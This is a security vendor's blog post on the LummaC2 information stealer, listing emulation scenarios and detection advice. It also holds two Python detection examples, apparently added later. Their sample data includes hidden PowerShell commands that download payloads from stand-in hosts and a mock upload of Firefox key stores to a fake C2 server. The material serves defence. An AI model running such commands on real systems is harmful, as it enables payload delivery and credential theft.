
Response to CISA Advisory (AA25-141B): Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations
On May 21, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) to disseminate the Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer malware, identified through FBI investigations as recent as May 2025.
Lumma Stealer, also known as LummaC2, is a lightweight subscription-based information stealer offered under the Malware-as-a-Service (MaaS) business model that has been active since at least 2022.
It has been advertised on Russian-speaking dark web forums since its origins but has also been seen being promoted on a Telegram channel since May 2023. As advertised, Lumma is approximately 150-200 KB and can affect operating systems ranging from Windows 7 to Windows 11.
At the beginning of its operation, Lumma will seek to perform system profiling by gathering information such as operating system version, architecture, language, and hardware details, such as CPU and memory, in order to rule out unwanted targets.
Following target selection, it collects sensitive information, primarily looking for browser information (Chromium and Mozilla-based) such as browsing history, cookies, extensions, usernames/passwords, personal identification details, and credit card numbers. It will then seek to identify cryptocurrency wallets and information related to two-factor authentication (2FA) before finally exfiltrating the collected information to the Command and Control (C2) server.
AttackIQ has previously released an assessment template emulating the behaviors exhibited by Lumma Stealer. AttackIQ has now updated this assessment template to incorporate the latest Tactics, Techniques and Procedures (TTPs) and malware samples revealed in CISA's Cybersecurity Advisory (CSA) to help customers test their security controls and their ability to defend against sophisticated threats.
Validating your security program performance against these behaviors is vital in reducing risk. By using this updated assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against a highly opportunistic, financially motivated threat.
- Assess your security posture against a threat interested in harvesting sensitive information in an automated and swift manner.
- Continuously validate detection and prevention pipelines against a threat interested in acquiring credentials that could be used for a subsequent attack.
Lumma Stealer – 2024-09 – Post-Compromise Tactics, Techniques and Procedures (TTPs)
This assessment template compiles all those post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Lumma Stealer during its most recent activities.
It is based on reports published by Cyble in January 2023, SOCRadar in February 2023, DarkTrace in September 2023, CyFirma in June 2024, Ontinue in August 2024, eSentire in September 2024 and CISA in May 2025.
1. Added! Lumma-related Components – Associated Payloads:
Consists of malicious components observed alongside or in support of Lumma Stealer activities, such as initial access payloads and droppers.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.
2. Added! Lumma Stealer – Payload Samples and Variants:
Includes the core payloads of Lumma Stealer across different versions, configurations or obfuscation methods.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.
3. Execution:
Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.
Process Injection (T1055): This scenario performs process injection by allocating memory in a running process with VirtualAlloc, writing shellcode to that memory space, and then changing the memory protection option with VirtualProtect.
System Binary Proxy Execution: Mshta (T1218.010): This scenario employs the Mshta Windows utility to download a remote Microsoft HTML Application (HTA) payload that includes VBScript code.
Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.
Added! System Binary Proxy Execution: Rundll32 (T1218.011): This scenario executes an export function from an AttackIQ DLL using the RunDll32 Windows utility.
Hijack Execution Flow: DLL Side-Loading (T1574.002): This scenario leverages a legitimate and trusted executable to side-load a malicious DLL.
4. Persistence
Techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario sets the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key that Windows uses to identify which applications should be run at system startup.
5. Defense Evasion
Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.
Virtualization/Sandbox Evasion (T1497): This scenario calls the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
6. Discovery
Consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.
Query Registry (T1012): This scenario queries the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings registry key, which contains user-specific properties such as proxy configurations, security zones, and privacy settings.
Added! Browser Bookmark Discovery (T1217): This scenario leverages a PowerShell script to enumerate browser bookmarks, using the Get-Content cmdlet to extract information about the host and its users.
7. Exfiltration
Consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption.
Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of Firefox sensitive information through HTTP POST requests. It exfiltrates the cert9.db and key4.db files from a Firefox session filled with staged credentials.
Added! Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive data by transmitting a text file containing 1000 credit card numbers through HTTP POST requests.
Added! Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive data by transmitting a text file with password patterns through HTTP POST requests.
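The three exfiltration scenarios above all push their data out as HTTP POST bodies: the Firefox certificate and key stores (cert9.db, key4.db), a file of credit card numbers, and a file of password patterns. The following Python is an added example, not AttackIQ's code or part of the assessment template, showing how a defender can run a content check over captured outbound POST requests to flag the first two cases. The request dictionaries, the field names, the Luhn-based card counter and the alert threshold are all assumptions made for this illustration; a real deployment would feed decrypted proxy or DLP captures through the same functions.

```python
"""Inspect outbound HTTP POST bodies for content matching the Lumma exfiltration scenarios.

Added example (not AttackIQ's code). Two checks are applied to each POST body:
  1. references to the Firefox credential stores named in the scenario (cert9.db, key4.db)
  2. a count of Luhn-valid payment card numbers, alerting once a threshold is crossed
"""
import re

# File names taken from the exfiltration scenario described on the page.
FIREFOX_STORE_FILES = ("cert9.db", "key4.db")

# 13 to 19 digits, optionally separated by spaces or dashes (assumed card formatting).
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")


def luhn_valid(digits: str) -> bool:
    """Return True when the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def count_card_numbers(body: str) -> int:
    """Count distinct-looking, Luhn-valid card numbers in a text body."""
    count = 0
    for match in CARD_RE.finditer(body):
        digits = re.sub(r"[ -]", "", match.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            count += 1
    return count


def inspect_post(request: dict, card_threshold: int = 2) -> list:
    """Return a list of finding tags for one captured request (assumed field names)."""
    findings = []
    if request.get("method", "").upper() != "POST":
        return findings
    body = request.get("body", "")
    for name in FIREFOX_STORE_FILES:
        if name in body:
            findings.append(f"firefox-store:{name}")
    n = count_card_numbers(body)
    if n >= card_threshold:
        findings.append(f"card-numbers:{n}")
    return findings


# Constructed sample captures (not real traffic). Card numbers are the usual
# publicly known test numbers; the last one is deliberately Luhn-invalid.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "http://c2.example.invalid/upload",
     "body": "4111111111111111\n5500000000000004\n378282246310005\n1234567890123456\n"},
    {"method": "POST", "url": "http://c2.example.invalid/upload",
     "body": 'Content-Disposition: form-data; name="f"; filename="key4.db"\r\n\r\n<binary>'},
    {"method": "GET", "url": "http://update.example.invalid/check", "body": ""},
    {"method": "POST", "url": "http://intranet.example.invalid/form",
     "body": "name=alice&ticket=20250521&comment=hello"},
]


def scan_requests(requests: list) -> dict:
    """Map the index of every request that produced findings to its finding tags."""
    return {i: f for i, r in enumerate(requests) if (f := inspect_post(r))}


if __name__ == "__main__":
    for idx, tags in scan_requests(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {SAMPLE_REQUESTS[idx]['url']} -> {', '.join(tags)}")
```

The card threshold exists because a single Luhn-valid number in a form submission is routine; the scenario moves a file of 1000 numbers, so even a low threshold separates it cleanly from normal traffic, and the threshold can be tuned per egress path.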
Opportunities to Expand Emulation Capabilities
In addition to the updated assessment template, AttackIQ recommends the following scenario to extend the emulation of the capabilities exhibited by Lumma Stealer:
Browser Bookmark Discovery Script: This scenario leverages a PowerShell script to enumerate browser bookmarks, using the Get-Content cmdlet to extract information about the host and its users.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.
2. Ingress Tool Transfer (T1105):
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
2a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == ("Cmd.exe" OR "Powershell.exe")
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
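The signature above is written as a pseudo-rule. The following Python is an added example, not AttackIQ's code, that turns it into a function and runs it over a handful of constructed process-creation events so the logic can be tested offline before it is ported to a SIEM or EDR query language. The event field names, the case-insensitive matching and the sample command lines are assumptions made for the illustration; the rule's terms themselves come from the signature above.

```python
"""Apply the Ingress Tool Transfer (T1105) hunting rule to process-creation events.

Added example (not AttackIQ's code). The rule mirrors the signature on the page:
  process name is cmd.exe or powershell.exe
  AND command line contains ("IWR" OR "Invoke-WebRequest")
  AND command line contains "DownloadData"
  AND command line contains "Hidden"
Matching is case-insensitive, which is an assumption made here because PowerShell
cmdlet names and parameters are themselves case-insensitive.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed field names)."""
    process_name: str      # image name or full path
    command_line: str


# Process names from the signature, compared case-insensitively on the file name only.
TARGET_PROCESSES = {"cmd.exe", "powershell.exe"}

# Cmdlet and alias from the signature, matched as whole words.
DOWNLOAD_CMDLET_RE = re.compile(r"\b(iwr|invoke-webrequest)\b", re.IGNORECASE)


def matches_ingress_rule(event: ProcessEvent) -> bool:
    """Return True when the event satisfies every clause of the signature."""
    image = event.process_name.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in TARGET_PROCESSES:
        return False
    cmd = event.command_line.lower()
    return (DOWNLOAD_CMDLET_RE.search(cmd) is not None
            and "downloaddata" in cmd
            and "hidden" in cmd)


def find_matches(events: list) -> list:
    """Return the indices of all events that fire the rule."""
    return [i for i, e in enumerate(events) if matches_ingress_rule(e)]


# Constructed sample events (not real telemetry). Only the first and last
# satisfy every clause; the others each miss exactly one.
SAMPLE_EVENTS = [
    ProcessEvent(
        "powershell.exe",
        '-WindowStyle Hidden -Command "IWR http://stage.example.invalid/a -OutFile a.bin; '
        '(New-Object Net.WebClient).DownloadData(\'http://stage.example.invalid/b\')"'),
    ProcessEvent("powershell.exe", "-Command Get-Process | Sort-Object CPU"),
    ProcessEvent(
        "cmd.exe",
        '/c powershell -w hidden -c "Invoke-WebRequest -Uri http://stage.example.invalid/x"'),
    ProcessEvent(
        "explorer.exe",
        "IWR x; DownloadData; Hidden"),        # right strings, wrong parent image
    ProcessEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        '-w Hidden -c "$d=(New-Object Net.WebClient).DownloadData((Invoke-WebRequest '
        'http://stage.example.invalid/c).Content)"'),
]


if __name__ == "__main__":
    for idx in find_matches(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"MATCH event {idx}: {ev.process_name} {ev.command_line[:60]}...")
```

Running the rule over a day of real process-creation telemetry before enabling it in production is the quickest way to see which clause (usually "Hidden") is doing the work and whether legitimate administration scripts in your environment trip it.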
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
Wrap-up
In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this opportunistic threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Francis Guibernau. Read the original post at: https://www.attackiq.com/2025/05/22/response-to-cisa-advisory-aa25-141b/